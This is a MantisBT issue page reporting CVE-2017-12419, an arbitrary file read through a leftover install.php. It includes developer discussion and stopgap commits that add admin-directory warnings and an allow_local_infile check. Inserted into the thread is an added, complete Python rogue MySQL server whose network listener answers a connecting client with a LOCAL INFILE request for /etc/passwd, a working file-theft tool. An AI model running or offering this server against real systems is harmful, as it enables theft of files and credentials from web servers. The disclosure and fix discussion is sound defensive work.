View Issue Details
| Field | Value |
|---|---|
| ID | 0023173 |
| Project | mantisbt |
| Category | installation |
| View Status | public |
| Date Submitted | 2017-08-01 00:46 |
| Last Update | 2017-08-04 19:35 |
| Reporter | iamsecurity |
| Assigned To | |
| Priority | normal |
| Severity | crash |
| Reproducibility | always |
| Status | confirmed |
| Resolution | open |
| Summary | 0023173: CVE-2017-12419: Arbitrary File Read inside install.php script |

Description: After successful installation of the bug tracker, it doesn't remove the install.php script; because of that, an attacker can read any file on the remote system through some of the installation process steps.

Steps To Reproduce: For successful exploitation, you need to run a special rogue MySQL server and connect to it from the server where you want to read files. Unfortunately, Mantis allows that. An attacker can go to any step of the installation process. /admin/install.php:
If you browse to the URL https://mantisbt/admin/install.php?install=3 then you go to the "install the database" section, where you can find that part of the code. /admin/install.php:
The script tries to connect to the MySQL server, but you can control the $f_hostname variable through the HTTP request parameter hostname. admin\install.php:
https://mantis/admin/install.php?install=3&hostname=127.0.0.1

Additional Information: This issue potentially affects ALL MantisBT versions running on MySQL / MariaDB, unless they have disabled local_infile.

Tags: No tags attached.
Attached Files: (none)
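The exchange the report relies on, as an added example that is not part of the original issue or of MantisBT's code: a minimal rogue MySQL server written here in Python. It greets the client with a protocol v10 handshake that advertises CLIENT_LOCAL_FILES, accepts any credentials, and answers the first COM_QUERY with a LOCAL INFILE request (a packet whose first byte is 0xFB) naming the file it wants; a client that negotiated CLIENT_LOCAL_FILES (mysqli with allow_local_infile enabled) then reads that file from its own disk and streams it to the server. Everything below is assumption for illustration: the server version string, the fixed salt, the listening port, the target path, and the scripted client transcript and sample file content (constructed stand-ins for what mysqli would put on the wire and for /etc/passwd), so the exchange can be run offline over in-memory streams.

```python
"""Rogue MySQL server demonstrating the LOAD DATA LOCAL INFILE file-read trick.

Added example, not MantisBT code. The attacker points the installer's
hostname parameter at a host running listen(); the installer's MySQL client
connects, and when this server answers its first query with a LOCAL INFILE
request, the client uploads the named file from the web server's own disk.
"""
import io
import socket
import struct

CLIENT_LOCAL_FILES = 0x0080          # capability bit the client must have negotiated
CLIENT_PROTOCOL_41 = 0x0200
CLIENT_SECURE_CONNECTION = 0x8000
CLIENT_PLUGIN_AUTH = 0x00080000
COM_QUERY = 0x03
LOCAL_INFILE_HEADER = 0xFB

# OK packet: header 0x00, affected rows 0, last insert id 0, status AUTOCOMMIT, 0 warnings
OK_PACKET = b"\x00\x00\x00" + struct.pack("<HH", 0x0002, 0)


def pack(seq, payload):
    """Frame a payload as a MySQL packet: 3-byte little-endian length, 1-byte sequence id."""
    return len(payload).to_bytes(3, "little") + bytes([seq & 0xFF]) + payload


def read_packet(stream):
    """Return (seq, payload) for the next packet, or (None, b'') at end of stream."""
    header = stream.read(4)
    if len(header) < 4:
        return None, b""
    return header[3], stream.read(int.from_bytes(header[:3], "little"))


def build_handshake():
    """Protocol v10 greeting. Credentials are never checked, so the salt is a fixed value."""
    caps = CLIENT_PROTOCOL_41 | CLIENT_LOCAL_FILES | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH
    salt = b"\x01" * 20                            # assumption: any 20 bytes will do
    return (
        b"\x0a"                                    # protocol version
        + b"5.7.0-rogue\x00"                       # server version (assumed string)
        + struct.pack("<I", 1)                     # connection id
        + salt[:8] + b"\x00"                       # auth-plugin-data part 1, filler
        + struct.pack("<H", caps & 0xFFFF)         # capability flags, lower 16 bits
        + b"\x21"                                  # character set utf8_general_ci
        + struct.pack("<H", 0x0002)                # status flags
        + struct.pack("<H", caps >> 16)            # capability flags, upper 16 bits
        + bytes([21])                              # auth-plugin-data length (8 + 13)
        + b"\x00" * 10                             # reserved
        + salt[8:] + b"\x00"                       # auth-plugin-data part 2, NUL-terminated
        + b"mysql_native_password\x00"
    )


def serve_connection(reader, writer, target_path):
    """Drive one client through the exchange; return the file bytes it uploaded."""
    def send(seq, payload):
        writer.write(pack(seq, payload))
        writer.flush()

    send(0, build_handshake())
    seq, _login = read_packet(reader)              # handshake response; credentials ignored
    if seq is None:                                # (an SSL request packet is not handled here)
        return b""
    send(seq + 1, OK_PACKET)                       # "authentication" always succeeds

    seq, cmd = read_packet(reader)                 # first command, normally COM_QUERY
    if not cmd or cmd[0] != COM_QUERY:
        return b""
    # Whatever the query was, answer with a LOCAL INFILE request naming the file we want.
    send(seq + 1, bytes([LOCAL_INFILE_HEADER]) + target_path.encode())

    chunks = []
    while True:                                    # client streams the file, then an empty packet
        seq, data = read_packet(reader)
        if not data:
            break
        chunks.append(data)
    if seq is not None:
        send(seq + 1, OK_PACKET)
    return b"".join(chunks)


SAMPLE_FILE = b"root:x:0:0:root:/root:/bin/bash\n"  # constructed stand-in for /etc/passwd


def scripted_client(file_bytes, chunk=16):
    """Constructed transcript of a vulnerable client: login, one query, then the file upload."""
    caps = CLIENT_PROTOCOL_41 | CLIENT_LOCAL_FILES | CLIENT_SECURE_CONNECTION
    login = struct.pack("<IIB", caps, 0x01000000, 0x21) + b"\x00" * 23 + b"root\x00" + b"\x00"
    out = pack(1, login) + pack(0, bytes([COM_QUERY]) + b"SELECT 1")
    seq = 2
    for i in range(0, len(file_bytes), chunk):
        out += pack(seq, file_bytes[i:i + chunk])
        seq += 1
    return out + pack(seq, b"")                    # empty packet terminates the upload


def demo(target_path="/etc/passwd"):
    """Run the exchange over in-memory streams; returns (captured bytes, server output)."""
    reader, writer = io.BytesIO(scripted_client(SAMPLE_FILE)), io.BytesIO()
    captured = serve_connection(reader, writer, target_path)
    return captured, writer.getvalue()


def listen(host="0.0.0.0", port=3306, target_path="/etc/passwd"):
    """Real listener (assumed port); point the installer's hostname parameter at this host."""
    with socket.create_server((host, port)) as srv:
        while True:
            conn, addr = srv.accept()
            with conn, conn.makefile("rb") as r, conn.makefile("wb") as w:
                got = serve_connection(r, w, target_path)
                print(f"{addr[0]} uploaded {len(got)} bytes of {target_path}")


if __name__ == "__main__":
    print(demo()[0].decode())
```

The server side cannot force the read: the 0xFB request is only honoured by a client that negotiated CLIENT_LOCAL_FILES, which is exactly why the stopgap commits below add a check for mysqli.allow_local_infile, and deleting admin/ removes the reachable entry point altogether. The installer's client may send other commands before the query the attacker expects; this example answers whatever COM_QUERY arrives first.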
Thanks for your report. As per documentation, after installation the administrator is expected to delete the admin/ directory:
It would also be the admin's responsibility to prevent local file lookup in their MySQL setup (see MySQL documentation). I'm not sure if or how we can actually prevent such an attack from MantisBT code though. If you have any ideas please let me know.

I can confirm the exploit, which I just tested on my dev box. Problem is, short of rewriting the whole installer to not rely on GPC parameters to control its state (which is not something I have the bandwidth for right now), I don't know how we could fix it. As a stopgap measure, I'll improve the documentation, system checks and warnings to better advise administrators of the vulnerability and potential risk.

@iamsecurity, after a bit of research, I found that by setting

MITRE assigned CVE-2017-12419 to this issue [scr370826]

@dregad I'll check your fix and it's working. Documentation has good security recommendations about deleting the admin folder, but in my practice I find many Mantis installations where the admin folder exists.

Thanks for your feedback.
That's true unfortunately; but we can only do so much, and system administrators also need to take on their responsibilities at some point. It's worth mentioning that a warning about the existence of the admin directory used to be shown on the login page in older versions of Mantis, but it was removed, probably by mistake, in 1.3.0 (see 0023179); this will be fixed in the next release, and should encourage administrators to do something about it.
That's an interesting approach. Problem is that we may not have write access to the file system, in which case the file would have to be created by the admin, so we're back to square one.

I just pushed several commits to improve the documentation and notifications to administrators about the presence of the admin directory, which will hopefully increase awareness about the issue and thus lower the risk of people being vulnerable without knowing it. I will leave this issue open, since it is not fixed from a Mantis perspective (we rely on user action to protect themselves).
MantisBT: master-2.5 d6d7dc2d 2017-08-03 12:54
Restore "admin dir" warning on login page

Commit 9da643a6f6c1b7604598968baa3cd2f6fd4540ff modified the admin checks on login page to remove the logic checking for pre 1.0 upgrade steps. However, it also (probably unintentionally) removed the check for admin directory presence, so administrators are no longer reminded that they should delete this directory, potentially leaving them exposed to security breaches. This commit restores the warning, and improves the error message.
Fixes 0023179
Stopgap measure for issue 0023173

Affected Issues: 0023173, 0023179, 0023185
mod - lang/strings_english.txt
mod - login_page.php

MantisBT: master-1.3.x 21a15b88 2017-08-03 12:54
Restore "admin dir" warning on login page

Commit 9da643a6f6c1b7604598968baa3cd2f6fd4540ff modified the admin checks on login page to remove the logic checking for pre 1.0 upgrade steps. However, it also (probably unintentionally) removed the check for admin directory presence, so administrators are no longer reminded that they should delete this directory, potentially leaving them exposed to security breaches. This commit restores the warning, and improves the error message.
Fixes 0023179
Stopgap measure for issue 0023173
Backported from master-2.5 branch d6d7dc2dc7473637c8ac17a78c0374f16981f409

Affected Issues: 0023173, 0023179, 0023186
mod - lang/strings_english.txt
mod - login_page.php

MantisBT: master-2.5 3a7c6f75 2017-08-03 15:39
Improve admin information about CVE-2017-12419

- Add admin check for mysqli.allow_local_infile
- Add reminder to remove admin dir at end of Admin checks
- Improve post-install tasks section of Admin Guide: add explicit warning about potential consequences of not deleting the admin directory, more descriptive wording.

Stopgap measures for issue 0023173

Affected Issues: 0023173, 0023185
mod - admin/check/check_database_inc.php
mod - admin/check/index.php
mod - docbook/Admin_Guide/en-US/Installation.xml

MantisBT: master-1.3.x 10211c90 2017-08-04 13:45
Improve admin information about CVE-2017-12419

- Add admin check for mysqli.allow_local_infile
- Add reminder to remove admin dir at end of Admin checks
- Improve post-install tasks section of Admin Guide: add explicit warning about potential consequences of not deleting the admin directory, more descriptive wording.

Stopgap measures for issue 0023173
Backported from master-2.5 branch 3a7c6f75bf3c4bc0856ebffe388df9e46ac10e5d
Conflicts: admin/check/index.php

Affected Issues: 0023173, 0023186
mod - admin/check/check_database_inc.php
mod - admin/check/index.php
mod - docbook/Admin_Guide/en-US/Installation.xml